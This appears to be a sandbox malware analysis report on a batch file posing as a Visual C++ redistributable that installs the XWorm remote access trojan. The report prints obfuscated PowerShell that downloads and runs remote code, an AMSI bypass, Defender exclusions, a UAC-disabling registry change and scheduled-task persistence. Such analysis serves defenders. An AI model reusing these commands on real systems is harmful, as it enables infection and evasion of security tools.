Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/03/2025, 23:41

General

  • Target

    VC_redist.x64.bat

  • Size

    27KB

  • MD5

    59ed597b16bdecda0fa1f5317d679506

  • SHA1

    e2117126d6e4b2dd02d4eee180c8f786c9b6424e

  • SHA256

    8b095c70bb18e878b288db10c7b9d5de9ed2df22f075b30ed0cbf3fdcb2c9342

  • SHA512

    d37b2f951d1093bb1f750d6996e080f0f5b20ac2cf5139f32f1b154bf2d4a61a8ecb033383e6a3d7fbb875dae63d147d7dc97bc241bf2da1497e378822004dea

  • SSDEEP

    384:eQxxUGTxvOwLNVpRP5mx39dm7dQgh+1Oi:xxigvOwLDpd5mx39L

Malware Config

Extracted

Family

xworm

Version

3.1

C2

185.172.175.125:5000

Mutex

Uto2xJheY5reQlME

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 2 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 62 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:336
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{044d5863-2f1e-475c-8450-b49d013e28e2}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4604
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:672
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:952
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:388
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:920
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1068
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1088
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1160
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2884
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FnMaesvTQxBC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aMxYenfxdQimUI,[Parameter(Position=1)][Type]$fVAPLWHCmW)$DOFxUUHMVHq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'ecte'+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+'e'+[Char](109)+'o'+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+''+[Char](117)+'le',$False).DefineType('My'+'D'+'e'+'l'+'eg'+'a'+'t'+[Char](101)+'T'+[Char](121)+''+[Char](112)+'e','C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+'s'+','+'A'+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$DOFxUUHMVHq.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+'ec'+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'S'+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$aMxYenfxdQimUI).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+'e'+''+'d'+'');$DOFxUUHMVHq.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+'e',''+'P'+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+'H'+'i'+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g'+[Char](44)+''+'N'+''+[Char](101)+''+'w'+'S'+'l'+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$fVAPLWHCmW,$aMxYenfxdQimUI).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+'g'+[Char](101)+''+[Char](100)+'');Write-Output $DOFxUUHMVHq.CreateType();}$BPosSaSOICDUk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+'l')}).GetType('M'+'i'+'c'+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+'i'+'n'+''+[Char](51)+''+[Char](50)+'.'+'U'+'n'+'s'+'af'+'e'+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+'e'+'t'+[Char](104)+'o'+'d'+''+[Char](115)+'');$letRKyvtZQSJfO=$BPosSaSOICDUk.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Pr'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+'r'+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jRmhQtjSKFwITpjKwea=FnMaesvTQxBC @([String])([IntPtr]);$APqDQFfxoTbtWRXPxuKhwk=FnMaesvTQxBC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eIukbgqnnjV=$BPosSaSOICDUk.GetMethod('Ge'+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'l'+'e'+''+'H'+''+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'ne'+'l'+''+[Char](51)+''+[Char](50)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')));$PkvxWVDrhnldWe=$letRKyvtZQSJfO.Invoke($Null,@([Object]$eIukbgqnnjV,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+'br'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$myPfjFkbxGsKfoygC=$letRKyvtZQSJfO.Invoke($Null,@([Object]$eIukbgqnnjV,[Object](''+'V'+''+[Char](105)+''+[Char](114)+'t'+'u'+''+'a'+'l'+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+'c'+[Char](116)+'')));$fVuwPYm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PkvxWVDrhnldWe,$jRmhQtjSKFwITpjKwea).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$YdMyHyCCSfCFeJhNI=$letRKyvtZQSJfO.Invoke($Null,@([Object]$fVuwPYm,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+'Sc'+[Char](97)+''+'n'+''+[Char](66)+''+'u'+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$GHoCLeEfMQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($myPfjFkbxGsKfoygC,$APqDQFfxoTbtWRXPxuKhwk).Invoke($YdMyHyCCSfCFeJhNI,[uint32]8,4,[ref]$GHoCLeEfMQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YdMyHyCCSfCFeJhNI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($myPfjFkbxGsKfoygC,$APqDQFfxoTbtWRXPxuKhwk).Invoke($YdMyHyCCSfCFeJhNI,[uint32]8,0x20,[ref]$GHoCLeEfMQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'s'+''+[Char](118)+''+[Char](115)+''+'t'+'ag'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2428
                    • C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
                      C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
                      2⤵
                      • Executes dropped EXE
                      PID:5072
                    • C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
                      C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
                      2⤵
                      • Executes dropped EXE
                      PID:3456
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                      PID:1212
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1308
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1324
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                          1⤵
                            PID:1412
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                            1⤵
                              PID:1432
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1456
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1488
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1560
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                      • Modifies registry class
                                      PID:2580
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1596
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1656
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1708
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1808
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1832
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1904
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1912
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1932
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1984
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:1668
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2164
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2172
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                            1⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2332
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2476
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2484
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                1⤵
                                                                  PID:2628
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                  1⤵
                                                                  • Drops file in System32 directory
                                                                  PID:2684
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2744
                                                                • C:\Windows\sysmon.exe
                                                                  C:\Windows\sysmon.exe
                                                                  1⤵
                                                                    PID:2756
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                    1⤵
                                                                      PID:2796
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                      1⤵
                                                                        PID:2860
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                        1⤵
                                                                          PID:3056
                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                          1⤵
                                                                            PID:1296
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                            1⤵
                                                                              PID:3340
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of UnmapMainImage
                                                                              PID:3428
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat"
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:4932
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  3⤵
                                                                                    PID:2668
                                                                                  • C:\Windows\system32\chcp.com
                                                                                    chcp.com 437
                                                                                    3⤵
                                                                                      PID:1052
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c type tmp
                                                                                      3⤵
                                                                                        PID:4020
                                                                                      • C:\Windows\system32\find.exe
                                                                                        fInd
                                                                                        3⤵
                                                                                          PID:1504
                                                                                        • C:\Windows\system32\find.exe
                                                                                          find
                                                                                          3⤵
                                                                                            PID:4464
                                                                                          • C:\Windows\system32\findstr.exe
                                                                                            fiNdstr /L /I set C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
                                                                                            3⤵
                                                                                              PID:4620
                                                                                            • C:\Windows\system32\findstr.exe
                                                                                              fiNdstr /L /I goto C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
                                                                                              3⤵
                                                                                                PID:3964
                                                                                              • C:\Windows\system32\findstr.exe
                                                                                                fiNdstr /L /I echo C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
                                                                                                3⤵
                                                                                                  PID:1148
                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                  fiNdstr /L /I pause C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
                                                                                                  3⤵
                                                                                                    PID:4860
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c type tmp
                                                                                                    3⤵
                                                                                                      PID:3132
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      PowerShell -WindowStyle Hidden -Command "$codes = 104,116,116,112,115,58,47,47,102,105,108,101,115,46,99,97,116,98,111,120,46,109,111,101,47,99,122,49,50,57,114,46,48,48,69,113,113;irm $([Text.Encoding]::ASCII.GetString(@($codes))) | iex"
                                                                                                      3⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Downloads MZ/PE file
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:3336
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXEcUTIONPoLICY ByPASS AdD-mPPrefEReNce -exCLUSioNPatH $eNv:PROGraMdatA, $enV:TeMp, $ENV:hoMeDRIvE; SEt-iTEmPRopErTy -PaTh "HKLM:\SOFTwArE\MicroSoFt\wINDOWs\curRenTVERsiON\PoLiCieS\sySTEm" -nAME "ConSENtprOmPTbEHAViorAdMIN" -VAluE 0 -tYPe DwoRD
                                                                                                        4⤵
                                                                                                        • UAC bypass
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:408
                                                                                                      • C:\ProgramData\FMyUS.eXe
                                                                                                        "C:\ProgramData\FMyUS.eXe"
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:784
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\PdHGtqQL.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\PdHGtqQL.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4328
                                                                                                      • C:\ProgramData\svOrbEl0.exe
                                                                                                        "C:\ProgramData\svOrbEl0.exe"
                                                                                                        4⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Drops startup file
                                                                                                        • Executes dropped EXE
                                                                                                        • Adds Run key to start application
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1236
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svOrbEl0.exe'
                                                                                                          5⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:3252
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            6⤵
                                                                                                              PID:4472
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svOrbEl0.exe'
                                                                                                            5⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4540
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              6⤵
                                                                                                                PID:740
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svOrbEl0.exe'
                                                                                                              5⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:4652
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                6⤵
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:1696
                                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                                              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svOrbEl0" /tr "C:\Users\Admin\AppData\Roaming\svOrbEl0.exe"
                                                                                                              5⤵
                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                              PID:1748
                                                                                                          • C:\ProgramData\1ZRs6.EXe
                                                                                                            "C:\ProgramData\1ZRs6.EXe"
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:4380
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c mountvol | find ":\"
                                                                                                          3⤵
                                                                                                            PID:232
                                                                                                            • C:\Windows\system32\mountvol.exe
                                                                                                              mountvol
                                                                                                              4⤵
                                                                                                                PID:4020
                                                                                                              • C:\Windows\system32\find.exe
                                                                                                                find ":\"
                                                                                                                4⤵
                                                                                                                  PID:1736
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -c add-mppreference -exclusionpath C:\
                                                                                                                3⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2400
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -c add-mppreference -exclusionpath F:\
                                                                                                                3⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                PID:1348
                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 1348 -s 368
                                                                                                                  4⤵
                                                                                                                  • Checks processor information in registry
                                                                                                                  • Enumerates system info in registry
                                                                                                                  PID:3404
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -c add-mppreference -exclusionpath D:\
                                                                                                                3⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1052
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -Command "$url = @();$url += 'h';$url += 't';$url += 't';$url += 'p';$url += 's';$url += ':';$url += '/';$url += '/';$url += 'f';$url += 'i';$url += 'l';$url += 'e';$url += 's';$url += '.';$url += 'c';$url += 'a';$url += 't';$url += 'b';$url += 'o';$url += 'x';$url += '.';$url += 'm';$url += 'o';$url += 'e';$url += '/';$url += 'l';$url += 'l';$url += 'l';$url += 'l';$url += 't';$url += 'm';$url += '.';$url += 'f';$url += 'M';$url += '2';$url += 'G';$url += 'z';$url = $url -join '';$output = \"$env:PUBLIC\winglog32.exe\";$output2 = \"$env:PUBLIC\winglog64.exe\"; Invok耻耻豆德:~13,1色饿克饿:~26,1%豆德阿维:~54,1%耻饿维饿:~49,1%阿维色尔:~10,1%阿维色尔:~22,1%阿维色尔:~14,1%豆德阿维:~51,1%耻饿维饿:~8,1%耻耻豆德:~39,1%豆德阿维:~60,1%色饿克饿:~57,1豆德阿维:~58,1%耻饿维饿:~32,1%耻耻豆德:~51,1%色饿克饿:~57,1耻饿维饿:~4,1%豆德阿维:~19,1%耻饿维饿:~31,1%色饿克饿:~57,1色饿克饿:~48,1%耻饿维饿:~4,1%阿维色尔:~54,1%耻饿维饿:~22,1%耻饿维饿:~54,1%豆德阿维:~18,1%豆德阿维:~54,1%色饿克饿:~57,1豆德阿维:~57,1%豆德阿维:~51,1%阿维色尔:~54,1%耻耻豆德:~43,1%耻耻豆德:~12,1%耻饿维饿:~18,1耻饿维饿:~30,1%阿维色尔:~52,1%阿维色尔:~54,1%阿维色尔:~39,1%阿维色尔:~42,1%阿维色尔:~54,1耻耻豆德:~9,1%豆德阿维:~19,1%耻耻豆德:~23,1%色饿克饿:~0,1%色饿克饿:~30,1%耻耻豆德:~39,1%豆德阿维:~48,1%色饿克饿:~57,1耻耻豆德:~33,1%耻耻豆德:~51,1%豆德阿维:~18,1%色饿克饿:~30,1%阿维色尔:~37,1%色饿克饿:~45,1%色饿克饿:~10,1%豆德阿维:~7,1%阿维色尔:~56,1色饿克饿:~52,1%耻耻豆德:~12,1%色饿克饿:~10,1%耻饿维饿:~28,1%豆德阿维:~51,1%阿维色尔:~54,1%耻饿维饿:~30,1耻耻豆德:~21,1%色饿克饿:~45,1%豆德阿维:~38,1%色饿克饿:~10,1"
                                                                                                                3⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:3868
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                            1⤵
                                                                                                              PID:3568
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                              1⤵
                                                                                                                PID:3748
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                • Suspicious use of AdjustPrivilegeToken
